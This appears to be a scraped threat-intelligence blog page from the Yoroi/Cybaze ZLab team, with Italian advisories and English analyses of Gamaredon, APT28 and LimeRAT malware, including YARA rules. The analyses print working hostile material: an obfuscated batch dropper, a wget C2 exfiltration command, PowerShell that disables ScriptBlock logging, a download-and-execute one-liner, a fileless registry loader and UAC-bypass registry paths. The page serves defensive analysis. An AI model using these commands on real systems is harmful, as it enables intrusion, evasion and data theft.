Importante Vulnerabilità in Servizi NTP

Proto: N050419.

Con la presente Yoroi desidera informarLa relativamente ad una vulnerabilità recentemente scoperta all’interno dei servizi NTP (Network Time Protocol), standard de-facto per la sincronizzazione degli orologi di sistema di una grandissima porzione di dispositivi connessi in rete. La criticità è nota con l’identificativo CVE-2019-11331.

La problematica è originata dall’uso improprio della porta udp/123, la quale può essere sfruttata da un attaccante di rete in scenari di attacco off-path (spoofing) per ottenere il totale controllo del sistema bersaglio.

Figura. Esposizione Internet Servizi NTP su porta udp/123 (Fonte:ShodanHQ)

La problematica non è ancora stata confermata dal Manutentore, tuttavia vari Vendor come Red-Hat, CISCO e SUSE stanno investigando la presenza della criticità all’interno dei pacchetti software da loro gestiti.

Per via della potenziale esposizione internet dei servizi afflitti e della gravità della problematica, Yoroi consiglia di monitorare lo stato di aggiornamento dei pacchetti software NTP presso le Vostre infrastrutture server, limitandone l’esposizione di rete qualora possibile ed applicando le patch di sicurezza in fase di rilascio.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

The Russian Shadow in Eastern Europe: Ukrainian MOD Campaign.


Few days after the publication of our technical article related to the evidence of possible APT28 interference in the Ukrainian elections, we spotted another signal of a sneakier on-going operation.

This campaign, instead, seems to be linked to another Russian hacking group: Gamaredon.  The Gamaredon APT was first spotted in 2013 and in 2015, when researchers at LookingGlass shared the details of a cyber espionage operation tracked as Operation Armageddon, targeting other Ukrainian entities. Their "special attention” on Eastern European countries was also confirmed by CERT-UA, the Ukrainian Computer Emergency Response Team.

The discovered attack appears to be designed to lure military personnel: it  leverage a legit document of the “State of the Armed Forces of Ukraine” dated back in the 2nd April 2019.

Figure 1: Fake document shown after infection

For this reason, Cybaze-Yoroi ZLAB team dissected this suspicious sample to confirm the possible link with Russian threat actors.

Technical Analysis

The origin of the infection is an executable file pretending to be an RTF document.

ThreatGamaredon Pteranodon stager (SFX file)

Table 1: Information about analyzed sample

Actually, the file is a Self Extracting Archive (SFX) claiming to be part of some Oracle software with an invalid signature. Its expiration date has been set up the 16th of March 2019.

Figure 2: Fake Oracle certificate with an expiration date set on 16th of March 2019

A first glance inside the  SFX archive reveals four different files. One of them is batch file containing the actual infection routine.

Figure 3: Files contained in SFX archive
@echo offset xNBsBXS=%random%*JjuCBOSFor %%q In (wireshark procexp) do (TaskList /FI "ImageName EQ %%q.exe" | Find /I "%%q.exe")If %ErrorLevel% NEQ 1 goto exitIf SddlzCf==x86 Set WqeZfrx=x64if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset "ldoGIUv=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"CEFNPKLIf SddlzCf==x86 Set WqeZfrx=x64set "UlHjSKD=%USERPROFILE%"set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset fnQWAZC=winsetupset xNBsBXS=%random%*JjuCBOSset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset "paJvVjr=Document"if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset eBqwVLK=%fnQWAZC%.lnkCEFNPKLif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset YFCaOEf=28262set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset vvozoFB=11326set lDwWuLo=26710If SddlzCf==x86 Set WqeZfrx=x64set prJqIBB=dcthfdyjdfcdst,tvset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOStaskkill /f /im %fnQWAZC%.exeCEFNPKLRENAME "%lDwWuLo%" %lDwWuLo%.exeset xNBsBXS=%random%*JjuCBOS%lDwWuLo%.exe "-p%prJqIBB%set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXScopy /y "%fnQWAZC%" "%UlHjSKD%\%fnQWAZC%.exe"if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSif exist "%UlHjSKD%\%fnQWAZC%.exe" call :GhlJKaGIf SddlzCf==x86 Set WqeZfrx=x64if not exist "%UlHjSKD%\%fnQWAZC%.exe" call :PEEnqrLset xNBsBXS=%random%*JjuCBOSRENAME "%YFCaOEf%" %eBqwVLK%if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOScopy "%eBqwVLK%" "%ldoGIUv%" /yset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSRENAME "%vvozoFB%" "%paJvVjr%.docx"if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOS"%CD%\%paJvVjr%.docx"set xNBsBXS=%random%*JjuCBOSexit /b
:GhlJKaGif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSstart "" "%UlHjSKD%\%fnQWAZC%.exe"CEFNPKLexit /b
:PEEnqrLset xNBsBXS=%random%*JjuCBOSRENAME "%fnQWAZC%" %fnQWAZC%.exe::6start "" "%fnQWAZC%.exe"If SddlzCf==x86 Set WqeZfrx=x64exit /b

Firstly, this batch script looks for the presence of running Wireshark and Process Explorer programs through the tasklist.exe utility. Then it renames the “11326” file in “Document.docx” and opens it. This is the decoy document seen in Figure 1.

The third step is to extract the contents of the password protected archive named “26710”. The scripts uses the hard-coded password “dcthfdyjdfcdst,tv” to extract its content, placing them it on “%USERPROFILE%\winsetup.exe” and creating a LNK symlink into the “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" directory to ensure its persistence.

ThreatGamaredon Pteranodon stager (SFX)

Table 2: Information about SFX stager

This additional file is a SFX file containing another script and a PE32 binary.

Figure 4: Files contained in SFX archive

MicrosoftCreate.exe” file is the UPX-packed version of the “wget” tool compiled for Window, a free utility for non-interactive HTTP downloads and uploads, a flexible tool commonly used by sys-admins and sometimes abused by threat actors.

The actual malicious logic of the Pteranodon implant is contained within the “30347.cmd” script. Besides junk instructions and obfuscation, the malware gather information about the compromised machine through the command “systeminfo.exe”. The results are stored into the file “fnQWAZC” and then sent to the command and control server “librework[.ddns[.net”, leveraging the wget utility previously found.

Figure 5: The C2 and obfuscations technique
MicrosoftCreate.exe --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" --post-data="versiya=arm_02.04&comp=ADMIN-PC&id=ADMIN-PC_del&sysinfo=Nome host:                            ADMIN-PC+###.......”
Figure 6: Information about victim machine sent to C2

The malware also schedules the execution of two other actions.

Figure 7: Persistence through task schedule

The first one tries to contact “bitwork[.ddns[.net” to download a “setup.exe” file and store it in the same folder. The other file, “ie_cash.exe”, is stored into the  “%APPDATA%\Roaming\Microsoft\IE\” folder. Despite the different name, it actually is another copy of the wget tool.

Figure 8: Persistence through task schedule (II)

The second scheduled activity is planned every 32 minutes and it is designed to run the files downloaded by the previous task. A typical trick part of the Gamaredon arsenal from long time: in fact, the recovered sample is part of the Pteranodon implant and matches its typical code patterns, showing no relevant edits with respect to previous variants.

In the end, investigating the “librework[.ddns[.net” domain we discovered several other samples connect to the same C2. All of them appeared in-the-wild during the first days of April, suggesting the command infrastructure might still be fully functional.

Figure 9: other samples linked to “librework[.ddns[.net” C2 (Source:VT)


The Pteranodon implant seems to be constantly maintained by the Gamaredon APT group since 2013, a tool the attackers found very effective since they are still using it after such a long time. A part this technical consideration, is quite interesting to notice how strong seems to be the Russian interest towards the East-Europe, along with the other recent state-sponsored activities possibly aimed to interfere with the Ukrainian politics (See “APT28 and Upcoming Elections: evidence of possible interference” and Part II), confirming this cyber-threat is operating in several fronts.

Indicators of Compromise

Yara Rules

rule GamaredonPteranodon_SFX {
   	 description = "Yara Rule for Pteranodon implant Family"
   	 author = "ZLAB Yoroi - Cybaze"
   	 last_updated = "2019-04-19"
   	 tlp = "white"
   	 category = "informational"

      $s1 = "SFX module - Copyright (c) 2005-2012 Oleg Scherbakov"
      $s2 = "7-Zip archiver - Copyright (c) 1999-2011 Igor Pavlov" 
      $s3 = "RunProgram=\"hidcon" 
      $s4 = "7-Zip - Copyright (c) 1999-2011 " ascii
      $s5 = "sfxelevation" ascii wide
      $s6 = "Error in command line:" ascii wide
      $s7 = "%X - %03X - %03X - %03X - %03X" ascii wide
      $s8 = "- Copyright (c) 2005-2012 "  ascii
      $s9 = "Supported methods and filters, build options:" wide ascii
      $s10 = "Could not overwrite file \"%s\"." wide ascii
      $s11 = "7-Zip: Internal error, code 0x%08X." wide ascii
      $s12 = "@ (%d%s)"  wide ascii
      $s13 = "SfxVarCmdLine0" ascii
      $s14 = "11326"
      $s15 = "29225"
      $s16 = "6137"
      $cmd = ".cmd" wide ascii 

      12 of ($s*) and $cmd

Ondata di Attacco Ursnif “FATTURA/DOC”

Proto: N04419.

Con la presente Yoroi desidera informarLa relativamente ad una recente ondata di attacchi rivolta ad utenti ed organizzazioni italiane. I messaggi di posta fraudolenti intercettati simulano l’invio di documentazione e copia di fatture, tuttavia al loro interno contengono documenti Excel malevoli in grado di infettare la vittima con un impianto malware della famiglia Ursnif: minaccia in grado di intercettare digitazioni da tastiera, trafugare le password salvate ed alterare la navigazione web utente.

Figura. Apertura del documento malevolo

Di seguito si riportano gli indicatori di compromissione estratti durante le analisi condotte:

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Vulnerabilità 0day in Oracle WebLogic

Proto: N030419.

Con la presente Yoroi desidera informarLa relativamente ad una pericolosa vulnerabilità all’interno delle piattaforma di servizio Oracle WebLogic, alla base di numerose applicazioni e portali web enterprise fondati su tecnologia Java. La criticità è nota con l’identificativo CNVD-C-2019-48814.

La problematica è originata da gravi lacune di validazione degli input durante le routine di deserializzazione input utente nelle componenti “wls9_async” e “wls-wsat”, attraverso le quali un attaccante remoto non autenticato può essere in grado di eseguire codice arbitrario all’interno del sistema bersaglio.

Secondo il bollettino CNTA-2019-0015 emanato da CNCERT/CC, il quale indica come afflitte le versioni WebLogic 10.x e WebLogic 12.1.3, la criticità non è ancora stata risolta dal Produttore nonostante il recente CPU di Aprile.

Per via della potenziale esposizione di servizi vulnerabili e dell’assenza di patch ufficiali, Yoroi consiglia caldamente di valutare la disabilitazione dei moduli vulnerabili “wls9_async_response.war” e “wls-wsat.war”, oppure di inibire l’accesso alle URL “/_async/*” e “/wls-wsat/*” all’interno di installazioni Oracle WebLogic eventualmente presenti nelle Vostre infrastrutture.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

APT28 and Upcoming Elections: Evidence of Possible Interference (Part II)


The uncertain attribution of the Ukrainian themed malicious document discussed in our past article “APT28 and Upcoming Elections: Possible Interference Signals”, led us to a review of Sofacy’s phishing techniques to confirm or deny the possible involvement of Russian state-sponsored actors in the election interference. We ended up in an old fake Hotel reservation request form, containing dummy interactive text boxes used to lure the victims to enable the macro code execution.

We analyzed this sample two years ago and we linked it to a Sofacy attack operation discovered by FE researchers in the mid of 2017, which hit several hotels in European and Middle Eastern countries.

Technical Analysis

Brief DescriptionGAMEFISH document dropper (reference sample, 2017)

The macro code inside the 2017 document is password protected, just like the last suspicious document we analyzed to investigate a possible Ukraine elections interference by Russian groups. After its opening, the reference sample decodes the extracted Base64 content using a custom “DecodeBase64” function:

Figure 1: Custom Base64 decryption routine

The decoded content is actually a DLL file which is written into “%AppData%\user.dat”. After that, it will be executed through an ASR bypass technique (Attack Surface Reduction) allowing attackers to run new child process within the Office environment. This is the same publicly available exploit previously found into the Ukrainian sample (more details in the next section).

Figure 2: Technique used to bypass Microsoft ASR protection

In this reference sample, the “user.dat”’s purpose is to create two new artifacts and to set persistence through “HKCU\Environment->UserInitMprLogonScript”. The created files are:

Figure 3: Persistence setting and artifacts creation by “user.dat” file

The “mrset.bat” file is a short bash file, designed to check the “mvtband.dat” existence and to run it through “rundll32.exe” system utility.

Figure 4: “mrset.bat” file code

Finally, the “mvtband.dat” file, which actually is a Delphi DLL library, is a well-known malware named “GAMEFISH” (f9fd3f1d8da4ffd6a494228b934549d09e3c59d1). Russian groups were used to use it in recon-phases to steal information from victim machine and to implant new payloads.

Figure 5: Information retrieved by mvtband.dll

Comparison with Ukrainian Elections Sample

ThreatDocument dropper
Brief DescriptionDropper of APT28 sample (Ukraine elections, 2019)

Despite some differences between the "Hospitality campaign" vector and the Ukraine elections one, both use similar TTP related to the APT28 group. The link between Hospitality malware and the "FancyBear" actor has been already sifted by Info-Sec community. So, we can exploit the similarities between it and the Ukrainian elections sample to link it to Russian hacker groups.

Both documents under analysis use protected macro code. All the code inside the macro is not obfuscated in any way: Hospitality document surprisingly contains code comments too. Moreover, the main macro function name is “Execute” for both documents and the ASR trick used to create new processes from the Office work-space is substantially the same.

Figure 6. The Ukraine elections macro on the left; Hospitality’s one on the right.

In both cases the real payload is encoded in Base64 and it is stored into an Office hidden section: the first sample uses a document property, the second one employs an XML resource.

The next stages are different: the Ukraine sample deploys some Powershell obfuscated scripts, which at the end carry an Empire stager, allowing the attackers to directly interact with the victim machine; the reference sample, instead, implants the GAMEFISH malware which automatically exfiltrates victim information while waiting for new payloads to install.


Finally, the attribution of the Ukraine elections sample (highlighted in our previous report) can be confirmed due to the strong similarities with the first stage of the Sofacy’s Hospitality malware, because:

The presence of these similarities between the droppers indicates, with high probability, the attacker is the same and consequentially suggests APT28 is reusing some 2017 tricks and code snippets which, despite their simplicity, make their attacks effective.

Indicators of Compromise

Yara Rules

rule APT28_office_document_dropper_GAMEFISH {
   	 description = "Yara Rule for office_document dropper (2017)"
   	 author = "ZLAB Yoroi-Cybaze"
   	 last_updated = "2019-04-16"
   	 tlp = "white"
   	 category = "informational"
   	 $a = "word\\vbaProject.binPK"
   	 $b = {E3 5D B8 1E 9C C7 11 F4 1E}
   	 $c = {36 B7 DD E9 6F 33 4b D7 E7 7F}
   	 all of them

import "pe"
rule APT28_user_dll {
   	 description = "Yara Rule for user_dll (2017)"
   	 author = "ZLAB Yoroi-Cybaze"
   	 last_updated = "2019-04-16"
   	 tlp = "white"
   	 category = "informational"
   	 $a = "MZ"
   	 $b = "GetEnvironmentVariable"
   	 $c = {49 73 50 72 6F 63 65 73 73 6F 72}
   	 all of them and pe.number_of_sections == 5

rule APT28_mrset_bat {
   	 description = "Yara Rule for mrset_bat_file (2017)"
   	 author = "ZLAB Yoroi-Cybaze"
   	 last_updated = "2019-04-16"
   	 tlp = "white"
   	 category = "informational"
   	 $a = "inst_pck"
   	 $b = "mvtband.dat"
   	 all of them

import "pe"
rule APT28_mvtband_dat_dll {
   	 description = "Yara Rule for mvtband_dat_dll (2017)"
   	 author = "ZLAB Yoroi-Cybaze"
   	 last_updated = "2019-04-16"
   	 tlp = "white"
   	 category = "informational"
   	 $a = "DGMNOEP"
   	 $b = {C7 45 94 0A 25 73 30 8D 45 94} // two significant instructions

   	 all of them and pe.sections[2].raw_data_size == 0 and pe.version_info["OriginalFilename"] contains "mvtband"

Nuova Campagna di Attacco sLoad

Proto: N020419.

Con la presente Yoroi desidera informarLa relativamente ad una estesa campagna di attacco rivolta ad aziende ed utenze italiane. Le email fraudolente contengono allegati in formato HTML i quali, una volta aperti, invitano allo scaricamento di un archivio compresso capace di infettare la macchina con una pericolosa backdoor della famiglia sLoad, in grado di intercettare digitazioni utente e permettere l’installazione di ulteriori impianti malware.

Figura. Esempio messaggio malevolo

L’ondata d'attacco intercettata suggerisce un potenziale rinnovo delle operazioni malevole della minaccia sLoad tracciata internamente come TH-163, oggetto dell’articolo di approfondimento tecnico “The sLoad Threat is Expanding to Italy”.

Di seguito si riportano gli indicatori di compromissioni estratti durante le investigazioni:

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

APT28 and Upcoming Elections: evidence of possible interference


In mid-March, a suspicious Office document referencing the Ukraine elections appeared in the wild. This file was uncommon, it seemed carefully prepared and was speaking about who is leading in the elections polls, arguing about the life of the favorite candidate, Volodymyr Zelenskiy, who is defined Servant of the People, along with a strong headline referencing conflicts between Ukraine and Russia. A copy of the Daily Express’ article published back in February.

This document actually is the first step of a more complex cyber attack.

Figure 1: Overview of the malicious document

The particular theme and its detection timing attracted our attention, so we decided to dig further to assess the nature of this malicious document.

Technical Analysis

ThreatDocument dropper
Brief DescriptionDropper of possible APT28 sample ukraine elections
Figure 2: password required to view and modify macros on document

The first peculiarity of the malicious document is the protected macro, in fact, when the user tries to read it immediately shows a message box asking for password. This Office password protection could be easily bypassed using the classic malware analysis tools and after the code extraction, it’s possible to analyze the plain-text code as follows.

Figure 3: source code of the document macro

At first glance there is no trace of obfuscated code, but an anomalous function invocation could be spotted into the macro: ActiveDocument.BuiltInDocumentProperties.Item(“Company”).This method allows to recover a property belonging to the document metadata. In the specific case, the code tries to read the value contained within the “Company” property, which is embedding a base64 encoded string.

Figure 4: Payload stored in “Company” tag of document metadata

The usage of document properties section to hide the malicious payload has also been used by the Emotet banking malware, one of the most aggressive malware threats against companies and users all around the world. Anyway, unlike the initial code, the decoded payload revealed a  highly obfuscated Powershell command.

Figure 5: powershell code after base64 to ascii conversion

After several deobfuscation stages, the clear code is the following:

Figure 6: clear powershell code

This script is quite interesting because its first action aims to lower its fingerprint: it disables the Powershell ScriptBlock logging and the Antimalware Scan Interface (AMSI).

The ScriptBlock logging feature was introduced in Powershell v5 and is able to log blocks of code as they are executed by the PowerShell engine, including obfuscated snippet and the correspondent deobfuscated one. AMSI, instead, is a versatile interface standard that allows applications and services to integrate with any anti-malware product installed on a machine, allowing them to evaluate code just prior to its execution, possibly after the payload de-obfuscation. Further detail about AMSI have been described in a previous analysis report.

So, the malware checks the current Powershell version: if it is greater or equal than 3, it disables the above mentioned security features. Both the features are bypassed using a few lines of code. The ScriptBlock logging can be disabled through the following instructions:

$settings = [Ref].Assembly.GetType("System.Management.Automation.Utils").GetField("cachedGroupPolicySettings","NonPublic,Static").GetValue($null);
$settings["HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"] = @{}
$settings["HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"].Add("EnableScriptBlockLogging", "0")

And the AMSI bypass code, instead, is even simpler:


This instruction is able to modify the value of “amsiInitFailed” variable, setting it to “true”. In this way, when the “ScanContent” method uses the variable to determine if AMSI should scan the command to be executed, it returns the AMSI_RESULT_NOT_DETECTED value and lets the payload run. Investigating these techniques, it seems the malware writer has taken inspiration from this article to implement these functionalities. The blog post, in fact, explains both AMSI and BlockLogging disabling techniques.

At this point, the powershell code tries to download the next infection stage from “hxxps://functiondiscovery[.]net:8443/admin/get.php”, after setting up the InternetExplorer 11 User-Agent to stay under the radar. This code also includes a Powershell Empire characteristic indicator: the cookie   “session=J+kcj5bWE11g4zBLrjvZjNO296I=”.

Figure 7: user agent set by malware

The network communication ends up into a command and control address is located in Czech Republic. This IP is was first seen on October 2018 and was active until April 2019.

Figure 8: information about DropURL/C2

A Problematic Attribution

The portion of script contacting the C2 server are created using the popular post-exploitation tool Empire and some Sofacy samples already analyzed by other firms used Empire-generated script as post-exploitation module. Moreover, according to FireEye’s analysis about the Russian hacker groups, APT28 is “increasing its reliance on public code repositories, such as Carberp, PowerShell Empire, P.A.S. webshell, Metasploit modules and others, likely to accelerate their development cycle and provide plausible deniability”.

APT28 (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM) launched several attacks on democratic institutions in Europe between September and December 2018. The group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. They were involved also in the string of attacks that targeted 2016 Presidential election.

According to a report published by Symantec in October, the group was actively conducting cyber espionage campaigns against government and military organizations in Europe and South America. Starting in 2017 and continuing into 2018, the APT28 group returned to covert intelligence gathering operations in Europe and South America.

Anyway, the capabilities of the analyzed sample makes some confusion about the attribution. As previously mentioned, in fact, the document’s content is not obfuscated in any way: the user can read the entire article about Ukraine elections, so why should he enable the macros? Moreover, also the macro code is totally readable without the usage of encryption or obfuscation to evade detection. The only macro protection mechanism consists in locking dev project from viewing through password, but it is easily bypassable using the classic malware analysis tools. All these elements are not too characteristics of the canonical APT28 droppers, in which the heavy obfuscation has been traditionally adopted. SecurityArtWork team, in their analysis, hypothesize the sample belongs to Sofacy group due to similarities between an older sample (8cccdce85beca7b7dc805a7f048fcd1bc8f7614dd7e13c2986a9fa5dfbbbbdf9) studied by Vitali Kremez. The researchers team highlighted the likeness between the functions names used into the macro code and the usage of WMI connector to start a new malicious process.

However, analyzing both the documents, the macros do not show the same structure even if the name of some functions are equals. In the right figure, corresponding to the sample analyzed by Vitali Kremez, the code is quite obfuscated: it includes “$” character to evade AVs and a custom base64 routine to perform decoding.

Figure 9: Macro comparison: newer sample (left) vs older sample (right)

The part of macro in which WMI is invoked corresponds to a trick used to bypass Microsoft ASR (Attack Surface Reduction) and launch a new process from Office applications. This trick, and the used code, is not directly related to the Russian group due to the fact that similar code snippets are publicly available on Github. So the similarity of the macro code between the documents substantially rely on this open-source code reuse.


We are not fully confident of this attribution, so we are investigating other recent samples related to the Sofacy group to better explore their possible interest in influencing political elections.

Stay Tuned for Part II.

Indicator of Compromise

Yara Rules

rule possible_APT28_ukraine_election_document {
	description = "Yara rule for ukraine_election_document"
	author = "Cybaze - Yoroi ZLab"
	last_updated = "2019-04-10"
	tlp = "white"
	category = "informational"
	$a1 = {F6 EC 18 27 58 C5 1E CB 36 B0 79}
	$a2 = {50 4B 03 04 14 00 06}
	$b = "[Content_Types].xml"

	all of them

Warning: Vulnerabilità in EMS Siemens

Proto: N010419.

Con la presente Yoroi desidera informarLa relativamente ad una vulnerabilità all’interno dell’Energy Management System (EMS) Spectrum Power di Siemens, sistema utilizzato in varie realtà ad elevata criticità in ambito manufacturing, energy, chimica, alimentare e agricoltura, gestione acque ed infrastrutture critiche. La problematica è nota con l’identificativo CVE-2019-6579.

Ricercatori di terze parti hanno infatti identificato gravi lacune di validazione degli input utente all’interno delle componenti “Project Enhancement” (PE) e “Web Office Portal” (WOP) di Spectrum Power (porte 80/tcp e 443/tcp), attraverso le quali un attaccante di rete non autenticato può iniettare comandi di sistema arbitrari sui dispositivi bersaglio, prendendone il controllo.

Il Produttore ha confermato la problematica rilasciando il bollettino SSA-324467, dove sono state rese disponibili patch di sicurezza per le versioni Spectrum Power 4.7 afflitte.

A questo proposito, per via della potenziale criticità dei dispositivi in oggetto, Yoroi suggerisce di appurare lo stato di vulnerabilità dei dispositivi Spectrum Power eventualmente in uso presso le Vostre infrastrutture, di limitarne l’esposizione di rete e di pianificare l’applicazione degli aggiornamenti disponibili.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

LimeRAT spreads in the wild


Few days ago, Cybaze-Yoroi ZLab team came across an interesting infection chain leveraging several techniques able to defeat traditional security defences and hiding a powerful inner payload able to seriously threaten its victims.

The whole infection chain was originated by a LNK file, a technique used by advanced attackers and APTs too, for this reason we decided to have a deeper look into these malicious samples revealing another infamous abuse of open-source projects. Too many times turned into fully-featured malware implants by unethical hackers and cyber criminals.

Technical Analysis

The origin of the infection chain is a simple LNK file, a technique originally adopted by state sponsored and advanced actors, designed to download and run a powershell file named “rdp.ps1” from a remote location through the command:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -Windo 1 $wm=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWVY'));sal g $wm;$IF=((New-Object Net.WebClient)).DownloadString('https://hacks4all[.net/rdp.ps1');g $I

The retrieved Powershell script works as dropper of the whole infection chain.

ThreatPowershell Dropper
Brief DescriptionPowershell dropper of LimeRAT

This script firstly retrieves the version of the Windows OS installed on the target machine using the “Get-WmiObject -Class Win32_OperatingSystem | Select-Object -ExpandProperty Version”  command. Then, depending on the returned value, it runs a couple of privilege escalation exploits able to bypass the UAC (User Account Control) feature, a well known security mechanism introduced since Vista to avoid unauthorized system configuration changes. The first one targets the Windows versions lower than 8.1, abusing a design flaw on the EventViewer process to execute a command with higher privileges.

This exploit works quite easily: the malware gains access to the registry key “HKCU:\Software\Classes\mscfile\shell\open\command” and inserts here the command to run its own payload, forcing its execution through the “eventvwr.exe” process which, due to a security flaw, executes it with the maximum privileges available.

Figure 1: Check of the target Windows version and preparation for the eventvwr.exe process exploit

The second exploit targets Windows 10 operating systems: it leverages a vulnerability inside the FODhelper process. The principle of this exploit is similar to the previous one, but the accessed registry key is “HKCU:\Software\Classes\ms-settings\Shell\Open\command” and the vulnerable process is “fodhelper.exe”.

Figure 2: Check of the target Windows version and preparation for the fodhelper.exe process exploit

These two exploits are both used to run a Powershell payload which, after its decoding, results in the invocation of an additional JavaScript code. The body of this script contains a unique anonymous function embedding other sub-functions and an enormous obfuscated variable.

Figure 3: Payload encoded in Base64 format and obfuscated with a custom subroutine
Figure 4: Piece of de-obfuscation subroutine

Its payload is a parameterized Powershell script having the purpose to install the final payload into the user registry hive, concluding the infection chain.

  "powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command ",
  "'));wscript '",
  "New-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -name 'FileName' -value '",
  "' -PropertyType String -Force;",
  " ##### FINAL PAYLOAD ##### "

  "$_b = (get-itemproperty -path 'HKCU:\\SOFTWARE\\Microsoft\\' -name 'Winkey').Winkey;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
Figure 5: Final payload written in the registry key in base64 Format

The Payload

Figure 6. Static payload data

The installed payload actually is a Base64 encoded PE32 file, file-lessly stored within the registry hive to avoid antivirus detection. It is written in C# and requires at least the .NET framework 3.2 to run. Exploring the malware code, we detected multiple evidence indication of the possible belonging malware family: LimeRAT.

LimeRAT is a powerful Remote Administration Tool publicly available to any internet user, it is an open-source project freely available on Github. Comparing its source code to the decompiled sample we were able to confirm there is a high compatibility between the payload and this open-source remote administration tool.

Figure 7: Decompiled code (on the left) and source code (on the right) on Github platform

The function reported above closely matches the open-source code. It also codes an interesting feature of the implant, in fact it allows the malware to register itself as “Critical Process” and when the user tries to kill it, a Blue Screen of Death (BSoD) is raised on the victim machine. Besides this peculiar tricks, the malware has a complete set of very powerful and dangerous capabilities, such as:

C2 Server

Figure 8. C2 retrieval

The malware command and control infrastructure abuses the Pastebin service to ensure resilience, in fact the malware dynamically retrieves the real C2 destination address from a pastie over an encrypted HTTPS channel.

Also, the attacker behind this sample leans on the Dynamic DNS service “”, pointing to the 213.183.58[.10 IP address located in Russia.

Investigating this network destination we figured out the registrar email, “anthony.marshall.1986[@gmail[.com”, is well known: this email appears in another AdWind/JRat malicious campaign dated back in 2017, suggesting this malicious actor is active for a long time.

Persistence Mechanisms

This sample also uses multiple persistence mechanisms, making more difficult to an improvised incident responder to get rid of the infection, because the choice to add this redundancy helps to ensure the infection last longer. In detail, it leverages at least three different persistence tricks, copying itself in three different paths:

Figure 9: The persistence mechanisms of the malware

The JavaScript code is executed through the following powershell command:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'FileName' -value 'C:\Users\admin\AppData\Local\Temp\fuw.js' -PropertyType String -Force;"


The analyzed case evidences how open-source projects are often abused by cyber criminals to pursue their malicious objectives and, even if the malware code and behaviour are well known, how those threat families are constantly re-arranged to avoid basic security controls, along with the observation of how cyber-criminals challengingly insist in their illicit operations over the years, refining their techniques to penetrate companies boundaries.

Indicators of Compromise

Yara Rules

rule LimeRat_201904 {
	description = "Yara rule for LimeRAT"
	author = "Cybaze - Yoroi ZLab"
	last_updated = "2019-04-08"
	tlp = "white"
	category = "informational"
	$a1 = { E5 A4 AA E5 AD AB E5 B0 87 }
	$a2 = { 61 02 D2 0A 7C 04 69 02 }
	$b = "LimeRAT" wide

	all of them

This blog post was authored by Luigi Martire and Luca Mella of Cybaze-Yoroi Z-LAB

Yoroi Welcomes "Yomi: The Malware Hunter"

Nowadays malware represents a powerful tool for cyber attackers and cyber criminals all around the world, with over 856 million of distinct samples identified during the last year it is, with no doubt, one of the major kinds of threat that companies and organizations are tackling to keep running their business without losing resources, time, money, shares and, last but not least, reputation and customers.

Decades of adversarial coevolution with the Anti-Virus industry led the malware threats to develop the ability to evade detection, bypassing security boundaries and staying silent until the proper time. Finally unleashing their malicious behaviour, enabling remote hackers, cyber-criminals and spies to steal secrets, data, digital goods and money,  compromising business processes and even human life. For fun and profit.

This battle, against malware, is huge. Trends and market evolution has shown no single Vendor has the power to overcome these threats, but the cooperation of security professionals, info-sec and intelligence communities, Vendors, CERTs and CSIRTs can.

